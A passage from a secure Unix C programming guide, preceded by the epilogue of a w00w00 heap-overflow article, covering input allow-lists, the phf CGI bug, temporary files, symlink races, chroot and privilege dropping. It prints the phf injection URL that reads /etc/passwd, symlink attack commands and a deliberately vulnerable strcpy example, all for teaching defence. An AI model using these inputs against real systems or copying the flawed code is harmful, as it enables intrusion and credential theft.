affiliates.

Other good sources of info include: as/gcc/ld info files
(/usr/info/*), BugTraq archives (http://www.geek-girl.com/bugtraq),
w00w00 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:
Most people who claim their systems are "secure" are saying so out of
a lack of knowledge (ignorant seemed a little too strong). Assuming
security leads to a false sense of security (e.g., azrael.phrack.com
has remote vulnerabilities involving heap-based overflows that have
gone unnoticed for quite a while). Hopefully, people will experiment
with heap-based overflows, and in turn, will become more aware that
the problems exist. We need to realize that the problems are out
there, waiting to be fixed.

Thanks for reading! We hope you've enjoyed it! You can e-mail me at
shok@dataforce.net, or mattc@repsec.com. See the w00w00
(www.w00w00.org) web site, also!

------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

Validating User Data

In some cases it is necessary to validate user input, and remove characters or data that are
illegitimate. A good example may be reading in a username for authentication. It is
possible to strip out all invalid characters that we know of, such as high-bit characters,
spaces, or numbers. The better way, however, is to strip out everything except that
which we want to allow. So, instead of guessing which characters may be dangerous and
stripping them out, only allow those that we know are safe. Stripping only known bad
characters is a common mistake when passing data to a second program using a shell command.

One of the most prominent examples of this problem occurred in a web-based CGI
application known as phf, which shipped with NCSA and Apache web servers by
default. phf was one of the leading causes of internet break-ins a number of years ago.
The phf program stripped out known bad characters before passing the data to a program
which was called via popen(). As it happens, it missed one character, the new-line (\n)
character, represented as %0a in the URL query string. By using this character in the data
that was passed to the program, an attacker could execute arbitrary commands on the
target host. When parsed by the shell interpreter on the remote host, the new-line
character acted as a command separator, so the string before the new-line was treated as one
command, and the string after the new-line as a new command. By asking for the
following URL, it was possible to execute the command “cat /etc/passwd” on the target
host, and view the password file in the web server’s response.

/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a

After this vulnerability was found, a fix was made to a common library function that was
responsible for cleaning the input. The newline character was added to a list of
characters that were removed from the input. This was fine and dandy for a period of
time, until someone found out that bash (the Bourne Again Shell), which is a common unix
shell interpreter, also allowed the character with value 255 as a command separator. This
opened up the same attack again for any operating system that had bash as its default
shell (such as Linux). If the fix had instead only allowed known good characters, this problem
would never have reoccurred.

Incorrect:

#define BAD "/ ;[]<>&\t"

char *query()
{
    char *user_data, *cp;

    /* Get the data */
    user_data = getenv("QUERY_STRING");

    /* Remove bad characters */
    for (cp = user_data; *(cp += strcspn(cp, BAD)); )
        *cp = '_';

    return user_data;
}

Correct:

#define OK "abcdefghijklmnopqrstuvwxyz\
ABCDEFGHIJKLMNOPQRSTUVWXYZ\
1234567890_-.@"

char *query()
{
    char *user_data, *cp;

    /* Get the data */
    user_data = getenv("QUERY_STRING");

    /* Remove all but good characters */
    for (cp = user_data; *(cp += strspn(cp, OK)); )
        *cp = '_';

    return user_data;
}

In the incorrect example, only known bad characters are removed from the query string.
This leaves in place any unknown dangerous characters. The correct example is safer
because it removes everything except known good characters.
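
The known-good approach can also be written as a small standalone function, which makes it
easy to check against the phf input. This is only a sketch: keep_known_good() and OK_CHARS
are names chosen for this illustration, and the allowed set is the one from the example above.

```c
#include <string.h>

#define OK_CHARS "abcdefghijklmnopqrstuvwxyz" \
                 "ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
                 "1234567890_-.@"

/*
 * Replace every byte of s that is not in OK_CHARS with '_'.
 * Returns the number of bytes replaced (0 for a NULL pointer).
 */
size_t keep_known_good(char *s)
{
    size_t replaced = 0;
    char *cp;

    if (s == NULL)
        return 0;

    /* strspn() skips the run of allowed bytes; whatever stops it is bad. */
    for (cp = s; *(cp += strspn(cp, OK_CHARS)) != '\0'; cp++) {
        *cp = '_';
        replaced++;
    }
    return replaced;
}
```

Applied to the decoded phf query "hell\ncat /etc/passwd\n", the new-lines, the space, and the
slashes are all replaced, and so is a byte such as 255 that nobody thought to put on a bad list.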

popen – process I/O
FILE * popen(const char *command, const char *type)
The popen() function “opens” a process by creating a bidirectional pipe, forking, and
invoking the shell.
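
Because popen() hands the command string to the shell, any shell metacharacter that survives
filtering is interpreted. One way to sidestep that, sketched below under the assumption of a
POSIX system, is to skip the shell and pass an argument vector directly to execv().
run_without_shell() is a hypothetical helper written for this illustration, and its error
handling is deliberately minimal.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Run 'path' with argument vector argv (no shell involved) and copy up to
 * outsize-1 bytes of its standard output into out, NUL-terminated.
 * Returns the child's exit status, or -1 on failure.
 */
int run_without_shell(const char *path, char *const argv[],
                      char *out, size_t outsize)
{
    int fds[2], status;
    size_t used = 0;
    ssize_t n;
    pid_t pid;

    if (outsize == 0 || pipe(fds) == -1)
        return -1;

    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {                     /* child: stdout goes to the pipe */
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) == -1)
            _exit(127);
        close(fds[1]);
        execv(path, argv);              /* arguments are passed verbatim */
        _exit(127);                     /* only reached if execv failed */
    }

    close(fds[1]);                      /* parent: read the child's output */
    while (used < outsize - 1 &&
           (n = read(fds[0], out + used, outsize - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);

    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With this approach an argument such as "x; echo injected" reaches the program as one literal
string; nothing splits it into a second command. Input validation is still needed for whatever
the called program itself does with its arguments.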

getenv
char * getenv(const char *name)
The getenv() function obtains the current value of the environment variable, name. If the
variable name is not in the current environment, a null pointer is returned.

Environment variables, much like command line options, provide a method to pass
arbitrary data to programs. The security concerns of environment variables apply more to
local system programs than network services, since network services do not accept
environment variables in the same fashion (except for a few). Environment variables can
be fashioned in a number of ways to elicit unexpected responses from programs.

• Buffer overflow - The same problem that appears in a plethora of other situations,
runs rampant in the handling of environment variables. The following is a typical
example of the type of problems which have been commonly seen in the field:

----begin getenv-example.c----
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char buf[512];
    strcpy(buf, getenv("HOME"));    /* no check on the length of HOME */
    printf("Your Home: %s", buf);
    return 0;
}
----end getenv-example.c----

• In the above function, no consideration is taken as to the size of the “HOME”
environment variable. Regardless of its size, it is copied into a 512 byte buffer,
introducing a buffer overflow condition.

An extreme case of this problem was found by Thomas Ptacek in the FreeBSD
operating system. Ptacek found a problem in the C runtime library on FreeBSD.
The C runtime library is statically linked with every program on the system. As a
result, every single setuid/setgid program on the system was vulnerable to a buffer
overflow via the environment (as was every other program, but this is
inconsequential).

The following text is quoted from Ptacek’s message to the Bugtraq mailing list in
February of 1997:

“There is a critically important security problem in FreeBSD 2.1.5’s C runtime support library that
will enable anyone with control of the environment of a process to cause it to execute arbitrary
code. All executable SUID programs on the system are vulnerable to this problem.

An immediately exploitable problem is evident in “startup_setrunelocale()”, which, if certain
environment variables are set, will copy the value of “PATH_LOCALE” directly into a 1024 byte
buffer on the routine’s stack. An attacker simply needs to insert machine code and virtual memory
addresses into the “PATH_LOCALE” variable, enable startup locale processing, and run a SUID
program.”

• Inheritance - It is important to note that environment variables are commonly
inherited by child processes that are spawned by the main process (this
depends on how the child is spawned, however). Therefore, be very careful
when passing environment variables to a child program. You can use the execle()
and execve() calls to run a program and specify its set of environment
variables. To be safe, it is usually a good idea to build an environment from
scratch, and specify only those variables which are required.
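
Both points above can be sketched in a few lines. copy_env() and exec_with_clean_env() are
hypothetical helpers written for this illustration, and the contents of the fixed environment
(the PATH and IFS values) are assumptions; a real program would list whatever its child
actually needs. The first function rejects a variable that does not fit the destination
instead of overflowing it, and the second starts a program with an environment built from
scratch.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Copy the value of environment variable 'name' into dst.
 * Returns 0 on success, -1 if the variable is unset or does not fit.
 */
int copy_env(const char *name, char *dst, size_t dstsize)
{
    const char *value = getenv(name);
    int n;

    if (value == NULL || dstsize == 0)
        return -1;

    n = snprintf(dst, dstsize, "%s", value);
    if (n < 0 || (size_t)n >= dstsize)
        return -1;                  /* too long: reject, do not truncate */
    return 0;
}

/*
 * Replace the current process with 'path', passing only a fixed,
 * minimal environment (assumed values). Returns -1 if execve() fails;
 * on success it does not return.
 */
int exec_with_clean_env(const char *path, char *const argv[])
{
    static char *const clean_env[] = {
        "PATH=/usr/bin:/bin",
        "IFS= \t\n",
        NULL
    };

    execve(path, argv, clean_env);
    return -1;
}
```

In the getenv example, copy_env("HOME", buf, sizeof(buf)) would take the place of the strcpy()
call, with the program exiting when it returns -1.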

Default Permissions (umask)

mode_t umask(mode_t numask)

The umask() routine sets the process’s file mode creation mask to numask and returns the
previous value of the mask. The 9 low-order access permission bits of numask are used
by system calls, including open(2),mkdir(2), and mkfifo(2), to turn off corresponding bits
requested in file mode.
A mode is created from or’d permission bit masks defined in <sys/stat.h>:
#define S_IRWXU 0000700 /* RWX mask for owner */
#define S_IRUSR 0000400 /* R for owner */
#define S_IWUSR 0000200 /* W for owner */
#define S_IXUSR 0000100 /* X for owner */

#define S_IRWXG 0000070 /* RWX mask for group */
#define S_IRGRP 0000040 /* R for group */
#define S_IWGRP 0000020 /* W for group */
#define S_IXGRP 0000010 /* X for group */

#define S_IRWXO 0000007 /* RWX mask for other */
#define S_IROTH 0000004 /* R for other */
#define S_IWOTH 0000002 /* W for other */
#define S_IXOTH 0000001 /* X for other */

#define S_ISUID 0004000 /* set user id on execution */
#define S_ISGID 0002000 /* set group id on execution */
#define S_ISVTX 0001000 /* sticky bit */
#ifndef _POSIX_SOURCE
#define S_ISTXT 0001000
#endif

When a file is created by you, or a program that you are running, it is created with a
default set of file permissions. These permissions are dictated by the setting of the
process’s umask. This is a setting that is inherited from the login shell or parent process
that executed the current process. It is important to ensure that files that are created do
not have unsafe permissions, allowing unauthorized users to access them.

The umask setting can be adjusted by utilizing the umask() call, which takes as a
parameter a set of bits. This set of bits is used to clear the associated bits in the mode of
the created file. Some example settings, for a file created with a requested mode of 0666, are:

umask(0) results in -rw-rw-rw-

This does not turn off any bits in the permissions of newly created files.

umask(022) results in -rw-r--r--

This turns off the write bits for the group and world portion of the file permission.

umask(066) results in -rw-------

This turns off the read and write bits for the group and world portion of the file
permission.
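
The three settings above can be checked with a small sketch such as the one below. The function name mode_after_umask() is an assumption made for illustration. It creates a file requesting mode 0666 under a given mask and reports the permission bits the file actually received.

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Hypothetical helper: create `path` requesting mode 0666 while the
 * umask is `mask`, and return the permission bits the new file ended
 * up with. Returns -1 on error. The file is removed again afterwards.
 */
int mode_after_umask(const char *path, mode_t mask)
{
    struct stat st;
    mode_t old;
    int fd;

    old = umask(mask);          /* umask() returns the previous mask */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0666);
    umask(old);                 /* restore the caller's mask */

    if (fd < 0)
        return -1;

    if (fstat(fd, &st) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }

    close(fd);
    unlink(path);

    return (int)(st.st_mode & 0777);
}
```

A program that handles sensitive data would normally call umask(077) or umask(066) once at startup, rather than trusting the mask inherited from its parent.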

2.3 Insecure Use of Temporary Files

Many vulnerabilities occur as the result of a program, not necessarily privileged,
accessing a well-known or predictable file on the file system. A program containing this
problem may open a file in the system temporary directory, blindly writing data to the
file. By utilizing symbolic links, an attacker can often redirect this data to other files.
There are 2 scenarios under which this type of attack is commonly launched:

1. A privileged system program is executed by the attacker. The privileged program
executes as the superuser on the system. The program opens up a file in the
system temporary directory:
/tmp/program.temp

By creating a symbolic link prior to execution, an attacker can point this file to other files
that are owned by the privileged user, which the program is executing as.

ln -s /etc/passwd /tmp/program.temp

When the program writes to this file, the symbolic link is followed, and the file written to
is actually /etc/passwd.

2. The attacker expects another user on the system to execute a known non-
privileged program with a temporary file handling issue. Being very patient, the
attacker creates a symbolic link.

ln -s /etc/passwd /tmp/program.temp

The attacker then expects another system user to execute the program, appending to the
password file, assuming the user executing the program has this privilege.

The primary difference between these 2 scenarios is that in the first example, the program
being executed is setuid root, and when executed runs as the super-user, while in the
second scenario, the program is only executed with the executing user’s permissions.

There are a number of solutions to these problems:

1. Don’t create temporary files in /tmp.
2. Create temporary file names that are random and not possible to predict.
3. Utilize a system provided interface for creating temporary files (mkstemp()).

There are a number of system provided functions that can be used to provide temporary
files, some of which need to be used correctly to avoid security consequences.

2.3.1. tmpfile()

The tmpfile() function creates a temporary file, and returns an open handle to the file
stream. tmpfile() avoids the race condition between the generation of a temporary
filename, and the creation of the file. tmpfile() is defined as follows:

FILE *tmpfile(void);

On many operating systems, tmpfile() will use the mkstemp() function to obtain and
create a temporary filename, then unlink() the file, and fdopen() the file descriptor to
return a stream handle.

Benefits

• A temporary file is safely created and an open stream to the file is returned.
• Avoids the race condition that occurs between the generation of the temporary
filename, and the opening of that file.
• The temporary file is unlinked once it has been created, preventing the file from
being accessed or opened by anyone else in the future – only the stream returned
by tmpfile() has access to the file now.

Restrictions

• The user has no control over where the file is created, although by default it is
usually /var/tmp or /tmp.
• The file is unlinked immediately, so it cannot be opened by another process
(which is usually the purpose of having a temporary file in the first place).

• As soon as the file descriptor is closed, the file disappears (since it has been
unlinked). All data is lost.
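
A minimal sketch of tmpfile() used as private scratch space follows. The function name scratch_roundtrip() is hypothetical. It writes a string to the anonymous file, rewinds, and reads it back through the same stream, which is the only handle that can reach the data.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: write `msg` to an anonymous temporary file,
 * rewind, and read it back into `out` (NUL terminated).
 * Returns 0 on success, -1 on failure.
 */
int scratch_roundtrip(const char *msg, char *out, size_t outlen)
{
    size_t len = strlen(msg);
    size_t n;
    FILE *fp;

    if (outlen == 0 || len >= outlen)
        return -1;              /* result would not fit in `out` */

    fp = tmpfile();             /* no filename is ever exposed */
    if (fp == NULL)
        return -1;

    if (fwrite(msg, 1, len, fp) != len) {
        fclose(fp);
        return -1;
    }

    rewind(fp);
    n = fread(out, 1, outlen - 1, fp);
    out[n] = '\0';

    fclose(fp);                 /* the data is gone after this point */

    return (n == len) ? 0 : -1;
}
```

This illustrates both sides of the trade-off listed above: no other process can open the file, and nothing survives the fclose().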

2.3.2. mkstemp()

The mkstemp() function creates a temporary file, given a template, and returns an open
file descriptor to the file. mkstemp() avoids the race condition between the generation of
a temporary filename, and the creation of the file. mkstemp() is defined as follows:

int mkstemp(char *template);


The mkstemp() function replaces the trailing X’s in the template with a unique string and
creates the file, mode 0600, returning a file descriptor opened for reading and writing. This
avoids the race between testing for a file’s existence and opening it for use. Because the
template is modified in place, it must be a writable character array and not a string literal.
An example usage would be:
char template[] = "/tmp/tempfileXXXXXX";
fd = mkstemp(template);

When using this function, make sure that you specify at least six trailing X’s. Some
operating systems support more than six X’s to increase the randomness of the filename.

Benefits

• A temporary file is safely created (assuming the system’s implementation is
secure) and an open file descriptor to the file is returned.
• Avoids the race condition that occurs between the generation of the temporary
filename, and the opening of that file.
• Some operating systems use the process ID of the running process to generate the
random filename. This makes the filename predictable, however this function is
still immune to race conditions.

Restrictions

• The file is visible by other system processes and is not unlinked as it is in
tmpfile().
• If the file permissions are not set securely, others can view or modify the contents
of the file.
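
A hedged sketch of mkstemp() usage that addresses the permissions restriction is shown below. The function name make_private_temp() and the /tmp/tempfile prefix are illustrative assumptions. The template is copied into a caller-supplied writable buffer, and the mode is set explicitly with fchmod() in case the system's mkstemp() does not create the file with mode 0600.

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Hypothetical helper: create a private temporary file.
 * `path` must be a writable buffer; on success it holds the generated
 * filename and the open descriptor is returned. Returns -1 on failure.
 */
int make_private_temp(char *path, size_t pathlen)
{
    static const char tmpl[] = "/tmp/tempfileXXXXXX";
    int fd;

    if (pathlen < sizeof(tmpl))
        return -1;
    memcpy(path, tmpl, sizeof(tmpl));   /* includes the trailing NUL */

    fd = mkstemp(path);                 /* rewrites the X's in place */
    if (fd < 0)
        return -1;

    /* do not rely on the implementation's default mode */
    if (fchmod(fd, S_IRUSR | S_IWUSR) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }

    return fd;
}
```

The caller is responsible for close() and unlink() once the file is no longer needed, since mkstemp() leaves the file visible in the directory.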

2.3.3. mktemp()

The mktemp() function is used to generate a unique filename, without actually
creating the file. mktemp() is defined as follows:

char *mktemp(char *template);

This function takes a template parameter in the same fashion as the mkstemp() function
above. In the template are a series of X’s, which are filled in by the function with
random values (sometimes) to create the random temporary file name. An example usage
would be:

char template[] = "/tmp/tempfileXXXXXX";
filename = mktemp(template);

Benefits

• A temporary file name is obtained (the file is not created)

Restrictions

• On MOST operating systems the file is easily predictable since the randomness
consists only of the process ID. This makes it easy to launch a race condition
attack.
• The filename is guaranteed to be unique only at the time at which the mktemp()
function verifies that the file does not already exist.
• If not used correctly, a race condition can exist between the time the filename is
generated, and the time the file is actually opened by the program.

When using mktemp() it is necessary to open the temporary file once the filename has
been generated. Be careful when opening the file.

open(filename, O_WRONLY | O_CREAT, 0644);

The above call will create the file, succeeding even if the file already exists. This is
dangerous, and can be used to overwrite existing files if a race condition exists.

open(filename, O_WRONLY | O_CREAT | O_EXCL, 0644);

The above is a safer way to create the file, since the call will fail, if the file already exists.
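
The safer open() call can be wrapped as in the sketch below. The function name write_new_file() and the choice of mode 0600 (instead of the 0644 used above) are assumptions for illustration. With O_CREAT | O_EXCL the call fails with EEXIST if anything, including a symbolic link, already exists at that name.

```c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>

/*
 * Hypothetical helper: create `filename` only if it does not already
 * exist and write `len` bytes of `data` to it.
 * Returns 0 on success, -1 on failure with errno set by the failing call.
 */
int write_new_file(const char *filename, const void *data, size_t len)
{
    int saved_errno;
    int fd;

    /* fails with EEXIST if the name is already taken (file or symlink) */
    fd = open(filename, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;

    if (write(fd, data, len) != (ssize_t)len) {
        saved_errno = errno;
        close(fd);
        unlink(filename);       /* do not leave a partial file behind */
        errno = saved_errno;
        return -1;
    }

    return close(fd);
}
```

If the call fails with EEXIST, the program should generate a new name and try again, or give up. It should never fall back to opening the existing file.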

2.4 File Race Conditions

There are a large number of different situations in which a race condition can occur,
giving an attacker the ability to subvert access checks or file creations. There is a
common pattern, which when identified, can be alleviated to secure the operation.

1. A permission check or status check is performed utilizing a filename
2. A file operation is then performed on the same filename

The problem that arises here is that in between the first and second operations, an attacker
can manipulate the file, causing the permissions or status check to succeed, and the file
operation to reference a different file.

This type of attack commonly utilizes symbolic links to take advantage of a program’s
insecurity. Let’s look at an example source code fragment, which could be present in an
insecure setuid root program:

int unsafeopen(char *filename)
{
    struct stat st;
    int fd;

    /* obtain the file's status information */
    if (stat(filename, &st) != 0)
        return -1;

    /* make sure that the file is owned by root - uid 0 */
    if (st.st_uid != 0)
        return -1;

    fd = open(filename, O_RDWR, 0);
    if (fd < 0)
        return -1;

    return fd;
}

Essentially the above function does the following:

1. Check to see whether filename exists and make sure it is owned by root (uid 0)
2. Open the file

Since these are 2 separate system calls, there is no atomicity between them, leaving a
time delay between the 2 specific operations. Within this time delay, it is possible for file
and system characteristics to change. An attacker can exploit this in the following
fashion:

1. He can create a symbolic link pointing /tmp/filename to a root owned file, for
example /etc/passwd.
2. The stat() call will follow the symbolic link, and return information for
/etc/passwd, which is owned by the root user (uid 0).
3. The attacker removes the symbolic link, and points it to a file he owns.
4. The program now happily opens /tmp/filename, which points to his file for
reading, and reads in his data, instead of the data from a file prepared by another
root owned process.

A safe version of this function would do the following:

int safeopen(char *filename)
{
    struct stat st, st2;
    int fd;

    /* obtain the file's status information */
    if (lstat(filename, &st) != 0)
        return -1;

    /* make sure the file is a regular file */
    if (!S_ISREG(st.st_mode))
        return -1;

    /* make sure that the file is owned by root - uid 0 */
    if (st.st_uid != 0)
        return -1;

    /* open the file */
    fd = open(filename, O_RDWR, 0);
    if (fd < 0)
        return -1;

    /* now we fstat() the file, to make sure it's the same file still! */
    if (fstat(fd, &st2) != 0) {
        close(fd);
        return -1;
    }

    /* here we make sure the inode and device numbers are the
     * same in the file we actually opened, compared to the file
     * we performed the initial lstat() call on.
     */
    if (st.st_ino != st2.st_ino || st.st_dev != st2.st_dev) {
        close(fd);
        return -1;
    }

    return fd;
}

The above function uses lstat() instead of stat(). This returns the status of the link, if the
specified filename happens to be a symbolic link. It then opens the file, and obtains the
status of the open file descriptor. The inode and device numbers of the status information
are compared (they are unique between files), and if they are not found to be identical,
the function is aborted.

2.5 Implementing a chroot environment

When implementing a network service that exposes an interface to the outside world, an
inherent risk is present. While the developer may have taken all precautions to ensure that
their code is correct and free from the obvious flaws, outside factors such as vulnerable
operating system library calls can introduce unknown vulnerabilities into the service.
UNIX systems possess the ability to limit this exposure by limiting a program’s view of
the operating system. This is achieved by using the chroot system call.

The semantics of this call are as follows:

int chroot(const char *path);

The chroot system call is used by a program to alter its view of the current file system.
Note that this only limits file system access, and the process still has access to other parts
of the operating system (system and network calls for example). When used, the path
argument specified to this call will be the new root directory of the filesystem. Once this
has been performed, the process can no longer access files or directories outside of this
new root directory. Only the super-user can execute the chroot system call.

Once you have used the chroot system call, you need to change to the new root directory.
An example usage is given here:

if (chroot("/jail") < 0 || chdir("/") < 0)
    perror("Failure setting new root directory");

In many situations, once you have used the chroot call, it is also wise to drop super-user
privileges. This will limit the exposure if a vulnerability does exist in your program. If a
user is able to compromise your program, and break into the limited environment, he has
a much greater chance of breaking out of this environment if he has super-user privileges.

A user with super-user access within the chrooted environment has access to key
operating system functionality which can allow them to break out of the chroot
environment:

• The ability to create key operating system devices, such as raw disk and kernel
memory devices, via the mknod() system call. Once created, it is possible to
access the disk and memory directly, making it possible to escape from the
chrooted environment.
• The ability to attach to other system processes that are not running within a
chrooted environment, and affect their operation (by, for example, injecting
malicious code into them). This functionality exists in most operating systems via
the ptrace() system interface, which is designed to allow debugging of system
processes (but can be used for malicious intent).
• The ability to send signals to other processes and affect their operation. This is
possible even without super-user privileges if the user has equivalent privileges to
the process they wish to send the signal to.

Some operating systems provide protection from the above scenarios by implementing a
mechanism called securelevels. This mechanism causes the operating system to run at a
higher security level. This can prevent even the super-user from breaking out of the
chroot environment. You should never expect this to be the case however, and should
always expect a worst-case configuration.

It is common for a program to drop privileges and run as the “nobody” user after
performing a chroot (and after performing all tasks which require super-user privileges).
While some programs do this, it is important to remember that even when running as the
“nobody” user, the process can affect the actions of other processes if they also run as the
“nobody” user. It is suggested that a special account be created for the process to run as,
and that this account not be used for any other purpose.

Ensure that the chroot environment is free from any setuid or setgid programs that may
allow an attacker to escalate their privileges if compromised.
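
Putting the pieces of this section together, a minimal sketch might look like the following. The function name enter_jail() is hypothetical, and the uid and gid passed in are assumed to belong to a dedicated account that the caller has already looked up. The _DEFAULT_SOURCE define is only there so that glibc declares chroot() under strict compiler settings.

```c
#define _DEFAULT_SOURCE         /* assumption: exposes chroot() on glibc */
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: confine the process to `jail`, then permanently
 * switch to the given unprivileged uid/gid.
 * Returns 0 on success, -1 on failure. On failure the caller should
 * exit rather than continue running with privilege.
 */
int enter_jail(const char *jail, uid_t uid, gid_t gid)
{
    /* requires super-user privileges */
    if (chroot(jail) < 0)
        return -1;

    /* move into the new root so no directory outside it stays current */
    if (chdir("/") < 0)
        return -1;

    /* group first: after setuid() we could no longer change it */
    if (setgid(gid) < 0)
        return -1;

    if (setuid(uid) < 0)
        return -1;

    return 0;
}
```

All work that needs the super-user (binding ports, opening protected files) has to happen before this call. Every return value is checked because a silent failure would leave the process either unconfined or still privileged.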

2.6 Dropping Privileges

Most programs require privilege to obtain access to a system resource that can only be
accessed by the super-user, or other specific accounts. In a network service, this is often
required to allocate a privileged TCP or UDP port, which a normal user cannot bind to. A
good example of this is a program like BIND (Berkeley Internet Name Daemon), which
needs to bind to port 53 to serve domain name queries. In a local privileged program, this
is normally required to access other restricted system resources, such as memory, disk, or
system configuration information.

While this privilege is normally only required upon initialization, there are many very
large programs, consisting of hundreds of thousands of lines of complex source code,
which never drop their privileges (today this usually occurs more in commercial
programs).

Sometimes a program is given such a privilege without any forethought. In a number of
past situations this has led to privileged programs containing trivially exploitable
vulnerabilities. When asked about the reasoning behind this, it was found that this was to
overcome some simple file access or system access restrictions, since the developer could
not see any other solution.

It is important that any privileged program be designed to allocate all resources upon
initialization, and then drop these privileges. Many privileged programs in the OpenBSD
operating system were redesigned with this goal in mind.

To drop privileges, the process needs to set its effective user ID and group ID to those
of the less privileged user. This is accomplished by using the seteuid() and setegid()
system calls to drop them temporarily, and the setuid() and setgid() system calls to drop
them permanently (this is explained in more detail below in the setuid program section).

WARNING: When dropping privileges, ensure that you first change the group ID of the
process (if this is necessary). If you set the user ID first, the program is no longer running
as the super-user, and therefore does not have sufficient privilege to change the group ID!
This will mean that the group ID privilege is not dropped, and anyone exploiting a
vulnerability in the subsequent program will be able to obtain the permissions of the
privileged group ID.

It is important that you check the return values from the setuid and setgid calls. When you
are dropping privileges, and these calls fail, the privileges will not be dropped. If the
return value is not checked, and appropriate action taken, the program will continue
operation as the privileged user.

2.6.1. In a network service

To drop privileges in a network service, you must choose a user for the program to run as
once those privileges are dropped. In many cases, the “nobody” user is chosen, as this
user has minimal access to the operating system in general.

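#include <sys/types.h>
#include <pwd.h>
#include <unistd.h>

int drop()
{
    struct passwd *pep = getpwnam("nobody");

    if (!pep)
        return -1;

    /* change the group ID first, while still super-user */
    if (setgid(pep->pw_gid) < 0)
        return -1;

    if (setuid(pep->pw_uid) < 0)
        return -1;

    return 0;
}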

2.6.2. In a local setuid program

When a privileged setuid or setgid program is executed, the process’s real user ID (uid)
and real group ID (gid) remain set to the executing user’s uid and gid, however the
effective user ID (euid), effective group ID (egid), saved user ID and saved group ID are
set to that of the file’s owner and group (the privileged user). You can drop privileges
temporarily or permanently, depending on your goal.

To drop privileges permanently, the program needs to set the euid, egid, saved uid and
saved gid to the real uid and gid. When called with super-user privileges, the setuid() and
setgid() calls set the real, effective and saved IDs to the specified value. Since the real uid
and gid in a setuid program are those of the unprivileged user, the following example will
set all 3 IDs to the current real IDs.

if (setgid(getgid()) < 0)
    return -1;

if (setuid(getuid()) < 0)
    return -1;
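
A slightly more defensive version of the permanent drop is sketched here. The function name drop_permanently() and the verification steps after the calls are additions for illustration, not part of the original text. After dropping, it confirms that the effective IDs match the real ones and that the super-user ID cannot be regained.

```c
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: permanently drop to the real uid/gid and verify
 * that the drop took effect. Returns 0 on success, -1 on failure.
 */
int drop_permanently(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* group first, while we may still have the privilege to change it */
    if (setgid(rgid) < 0)
        return -1;

    if (setuid(ruid) < 0)
        return -1;

    /* the effective IDs must now equal the real IDs */
    if (geteuid() != ruid || getegid() != rgid)
        return -1;

    /* unless the real user is root, regaining root must be impossible */
    if (ruid != 0 && setuid(0) == 0)
        return -1;

    return 0;
}
```

If this function returns -1 the program should terminate, since it may still hold privileges it believes it has given up.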

To temporarily drop privileges, with the intention of regaining them in the future, set the
effective ID’s to the desired values. This works since the effective ID’s are used to
perform system call and permission checks. This will ensure that the saved ID’s are
preserved, allowing you to revert back to them in the future. Ensure that you store the
values of the ID’s for future use however (unless you know that it will always be super-
user).

struct passwd *pep = getpwnam("nobody");
uid_t saved_uid;
gid_t saved_gid;

if (!pep)
    return -1;

saved_uid = geteuid();
saved_gid = getegid();

if (setegid(pep->pw_gid) < 0)
    return -1;

if (seteuid(pep->pw_uid) < 0)
    return -1;

/* perform desired unprivileged operations then revert back */

if (setegid(saved_gid) < 0)
    return -1;

if (seteuid(saved_uid) < 0)
    return -1;

2.7 Generating Random Numbers

Random number generation has been an issue without an easy solution ever since random
numbers were needed. Most operating systems provide a pseudo-random number
generator library call, which is appropriate for some purposes, however remember the
word “pseudo” in the name. Some operating systems offer built-in random number
generators, usually via a device driver that provides random data. This is most often
accomplished via a kernel driver that mixes and hashes various events and variables on
the system. We will cover some well known methods for obtaining random data in
various operating systems.

2.7.1 Linux

Current Linux operating systems provide the /dev/random and /dev/urandom devices.
These devices provide random numbers based on various system states, that are collected
and then hashed to produce a random number.

It is claimed that both /dev/random and /dev/urandom are secure enough to use in
generating cryptographic keys, challenges, and other applications where secure random
numbers are requisite. It should not be possible to predict the next random number from
these sources.

The difference between the two is that /dev/random can run out of random bytes and the
reader must wait for more to become available. This can occur if not enough activity is
present on the system to allow generation of additional random data, and can sometimes
take a long time for new data to become available.

/dev/random is high quality entropy, generated from measuring the inter-interrupt times
etc. It blocks until enough bits of random data are available.

/dev/urandom is similar, but when the store of entropy is running low, it’ll return a
cryptographically strong hash of what there is. This isn’t as secure, but it’s enough for
most applications.

To use these devices, simply open the device name and perform a read call on the device
for the desired number of bytes.
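
A minimal sketch of that open-and-read sequence follows. The function name get_random_bytes() is an assumption, and /dev/urandom is used here so that the call does not block. The loop handles short reads and interrupted calls, which a single read() would silently ignore.

```c
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>

/*
 * Hypothetical helper: fill `buf` with `len` bytes from /dev/urandom.
 * Returns 0 on success, -1 on failure.
 */
int get_random_bytes(void *buf, size_t len)
{
    unsigned char *p = buf;
    ssize_t n;
    int fd;

    fd = open("/dev/urandom", O_RDONLY);
    if (fd < 0)
        return -1;

    while (len > 0) {
        n = read(fd, p, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;       /* interrupted by a signal, retry */
            close(fd);
            return -1;
        }
        if (n == 0) {           /* unexpected end of file */
            close(fd);
            return -1;
        }
        p += n;
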